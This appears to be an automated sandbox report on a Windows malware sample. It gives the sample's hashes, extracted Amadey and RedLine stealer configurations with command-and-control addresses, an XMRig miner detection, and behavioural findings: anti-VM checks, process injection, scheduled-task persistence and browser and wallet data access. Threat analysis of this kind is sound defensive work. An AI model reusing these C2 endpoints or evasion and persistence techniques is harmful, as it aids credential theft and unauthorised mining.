Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-06-2024 02:52
Static task
static1
Behavioral task
behavioral1
Sample
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
Resource
win10v2004-20240508-en
General
-
Target
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
-
Size
1.8MB
-
MD5
2e70b996132ba5d2caae18bc7479fd8c
-
SHA1
4569cc7318cc3cf4496f5293df0e5c4430b1c696
-
SHA256
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da
-
SHA512
2cccfc7adb6d653497037d8742dd47cd4969445e277db1791df0c70a0a06b60a05c663f5001ec4cbbf8f845f7a01ff8d81f0451680791f2140640eebc33266f9
-
SSDEEP
49152:CGW73yMoyRJ92lnHylhoYAgl7APX9oP/EbNb2qCdx5:CVLn9nh3H7oisb0qCdr
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
AMA
185.215.113.67:40960
Extracted
redline
LiveTraffic
4.185.27.237:13528
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe family_redline behavioral2/memory/1644-41-0x0000000000570000-0x00000000005C0000-memory.dmp family_redline behavioral2/memory/2456-66-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exeaxplong.exeaxplong.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
XMRig Miner payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/5220-528-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-527-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-531-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-534-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-533-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-532-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-530-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-535-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5220-536-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 45 372 powershell.exe 46 372 powershell.exe 47 4784 powershell.exe 49 4784 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5456 powershell.exe 2164 powershell.exe 5472 powershell.exe 372 powershell.exe 4784 powershell.exe 4212 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplong.exec5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exeaxplong.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Executes dropped EXE 17 IoCs
Processes:
axplong.exeama.exegold.exelummac2.exeNewLatest.exeHkbsse.exeInstaller.exelegs.exe1.exeFirstZ.exetaskweaker.exe6.exeaxplong.exeHkbsse.exereakuqnanrkn.exeHkbsse.exeaxplong.exepid process 1564 axplong.exe 1644 ama.exe 2668 gold.exe 1804 lummac2.exe 4796 NewLatest.exe 412 Hkbsse.exe 3792 Installer.exe 3584 legs.exe 468 1.exe 1396 FirstZ.exe 3828 taskweaker.exe 2940 6.exe 6096 axplong.exe 6120 Hkbsse.exe 5480 reakuqnanrkn.exe 6020 Hkbsse.exe 812 axplong.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplong.exeaxplong.exeaxplong.exec5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/5220-522-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-528-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-527-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-531-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-534-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-533-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-532-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-530-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-525-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-526-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-524-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-523-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-535-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5220-536-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Installer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Installer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 5712 powercfg.exe 1384 powercfg.exe 376 powercfg.exe 2976 powercfg.exe 776 powercfg.exe 5684 powercfg.exe 5692 powercfg.exe 5700 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exereakuqnanrkn.exeFirstZ.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe reakuqnanrkn.exe File opened for modification C:\Windows\system32\MRT.exe FirstZ.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exeaxplong.exeaxplong.exepid process 3284 c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe 1564 axplong.exe 6096 axplong.exe 812 axplong.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
gold.exelegs.exetaskweaker.exereakuqnanrkn.exedescription pid process target process PID 2668 set thread context of 2456 2668 gold.exe RegAsm.exe PID 3584 set thread context of 4824 3584 legs.exe RegAsm.exe PID 3828 set thread context of 6040 3828 taskweaker.exe BitLockerToGo.exe PID 5480 set thread context of 4488 5480 reakuqnanrkn.exe conhost.exe PID 5480 set thread context of 5220 5480 reakuqnanrkn.exe explorer.exe -
Drops file in Windows directory 2 IoCs
Processes:
NewLatest.exec5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exedescription ioc process File created C:\Windows\Tasks\Hkbsse.job NewLatest.exe File created C:\Windows\Tasks\axplong.job c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5948 sc.exe 2676 sc.exe 2060 sc.exe 5548 sc.exe 5636 sc.exe 6064 sc.exe 6108 sc.exe 3024 sc.exe 5352 sc.exe 5728 sc.exe 4848 sc.exe 5888 sc.exe 4784 sc.exe 5916 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3336 3584 WerFault.exe legs.exe 1616 468 WerFault.exe 1.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 50 IoCs
Processes:
powershell.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 952 schtasks.exe 4600 schtasks.exe 2480 schtasks.exe 2944 schtasks.exe 4044 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exepowershell.exepowershell.exepowershell.exeRegAsm.exeama.exemsedge.exe6.exemsedge.exemsedge.exeidentity_helper.exepowershell.exeaxplong.exeFirstZ.exepowershell.exereakuqnanrkn.exepowershell.exepid process 3284 c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe 3284 c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe 1564 axplong.exe 1564 axplong.exe 372 powershell.exe 372 powershell.exe 4212 powershell.exe 4212 powershell.exe 4212 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4824 RegAsm.exe 4824 RegAsm.exe 1644 ama.exe 1644 ama.exe 1644 ama.exe 1644 ama.exe 2540 msedge.exe 2540 msedge.exe 2940 6.exe 2940 6.exe 2560 msedge.exe 2560 msedge.exe 380 msedge.exe 380 msedge.exe 5248 identity_helper.exe 5248 identity_helper.exe 5456 powershell.exe 5456 powershell.exe 5456 powershell.exe 6096 axplong.exe 6096 axplong.exe 1396 FirstZ.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 1396 FirstZ.exe 5480 reakuqnanrkn.exe 5472 powershell.exe 5472 powershell.exe 5472 powershell.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe 5480 reakuqnanrkn.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
powershell.exeRegAsm.exepowershell.exepowershell.exeama.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 372 powershell.exe Token: SeDebugPrivilege 4824 RegAsm.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeBackupPrivilege 4824 RegAsm.exe Token: SeSecurityPrivilege 4824 RegAsm.exe Token: SeSecurityPrivilege 4824 RegAsm.exe Token: SeSecurityPrivilege 4824 RegAsm.exe Token: SeSecurityPrivilege 4824 RegAsm.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 1644 ama.exe Token: SeDebugPrivilege 5456 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeShutdownPrivilege 5712 powercfg.exe Token: SeCreatePagefilePrivilege 5712 powercfg.exe Token: SeShutdownPrivilege 5700 powercfg.exe Token: SeCreatePagefilePrivilege 5700 powercfg.exe Token: SeShutdownPrivilege 5684 powercfg.exe Token: SeCreatePagefilePrivilege 5684 powercfg.exe Token: SeShutdownPrivilege 5692 powercfg.exe Token: SeCreatePagefilePrivilege 5692 powercfg.exe Token: SeDebugPrivilege 5472 powershell.exe Token: SeShutdownPrivilege 376 powercfg.exe Token: SeCreatePagefilePrivilege 376 powercfg.exe Token: SeShutdownPrivilege 1384 powercfg.exe Token: SeCreatePagefilePrivilege 1384 powercfg.exe Token: SeShutdownPrivilege 2976 powercfg.exe Token: SeCreatePagefilePrivilege 2976 powercfg.exe Token: SeShutdownPrivilege 776 powercfg.exe Token: SeCreatePagefilePrivilege 776 powercfg.exe Token: SeLockMemoryPrivilege 5220 explorer.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exelegs.exepowershell.execmd.exeHkbsse.exedescription pid process target process PID 3284 wrote to memory of 1564 3284 c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe axplong.exe PID 3284 wrote to memory of 1564 3284 c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe axplong.exe PID 3284 wrote to memory of 1564 3284 c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe axplong.exe PID 1564 wrote to memory of 1644 1564 axplong.exe ama.exe PID 1564 wrote to memory of 1644 1564 axplong.exe ama.exe PID 1564 wrote to memory of 1644 1564 axplong.exe ama.exe PID 1564 wrote to memory of 2668 1564 axplong.exe gold.exe PID 1564 wrote to memory of 2668 1564 axplong.exe gold.exe PID 1564 wrote to memory of 2668 1564 axplong.exe gold.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 2668 wrote to memory of 2456 2668 gold.exe RegAsm.exe PID 1564 wrote to memory of 1804 1564 axplong.exe lummac2.exe PID 1564 wrote to memory of 1804 1564 axplong.exe lummac2.exe PID 1564 wrote to memory of 1804 1564 axplong.exe lummac2.exe PID 1564 wrote to memory of 4796 1564 axplong.exe NewLatest.exe PID 1564 wrote to memory of 4796 1564 axplong.exe NewLatest.exe PID 1564 wrote to memory of 4796 1564 axplong.exe NewLatest.exe PID 4796 wrote to memory of 412 4796 NewLatest.exe Hkbsse.exe PID 4796 wrote to memory of 412 4796 NewLatest.exe Hkbsse.exe PID 4796 wrote to memory of 412 4796 NewLatest.exe Hkbsse.exe PID 1564 wrote to memory of 3792 1564 axplong.exe Installer.exe PID 1564 wrote to memory of 3792 1564 axplong.exe Installer.exe PID 3792 wrote to memory of 1980 3792 Installer.exe cmd.exe PID 3792 wrote to memory of 1980 3792 Installer.exe cmd.exe PID 1980 wrote to memory of 2480 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 2480 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 2944 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 2944 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 372 1980 cmd.exe powershell.exe PID 1980 wrote to memory of 372 1980 cmd.exe powershell.exe PID 1564 wrote to memory of 3584 1564 axplong.exe legs.exe PID 1564 wrote to memory of 3584 1564 axplong.exe legs.exe PID 1564 wrote to memory of 3584 1564 axplong.exe legs.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 3584 wrote to memory of 4824 3584 legs.exe RegAsm.exe PID 1980 wrote to memory of 4212 1980 cmd.exe powershell.exe PID 1980 wrote to memory of 4212 1980 cmd.exe powershell.exe PID 4212 wrote to memory of 3892 4212 powershell.exe cmd.exe PID 4212 wrote to memory of 3892 4212 powershell.exe cmd.exe PID 1980 wrote to memory of 4784 1980 cmd.exe powershell.exe PID 1980 wrote to memory of 4784 1980 cmd.exe powershell.exe PID 3892 wrote to memory of 4044 3892 cmd.exe schtasks.exe PID 3892 wrote to memory of 4044 3892 cmd.exe schtasks.exe PID 3892 wrote to memory of 2544 3892 cmd.exe reg.exe PID 3892 wrote to memory of 2544 3892 cmd.exe reg.exe PID 3892 wrote to memory of 952 3892 cmd.exe schtasks.exe PID 3892 wrote to memory of 952 3892 cmd.exe schtasks.exe PID 3892 wrote to memory of 4600 3892 cmd.exe schtasks.exe PID 3892 wrote to memory of 4600 3892 cmd.exe schtasks.exe PID 412 wrote to memory of 468 412 Hkbsse.exe 1.exe PID 412 wrote to memory of 468 412 Hkbsse.exe 1.exe PID 412 wrote to memory of 468 412 Hkbsse.exe 1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe"C:\Users\Admin\AppData\Local\Temp\c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
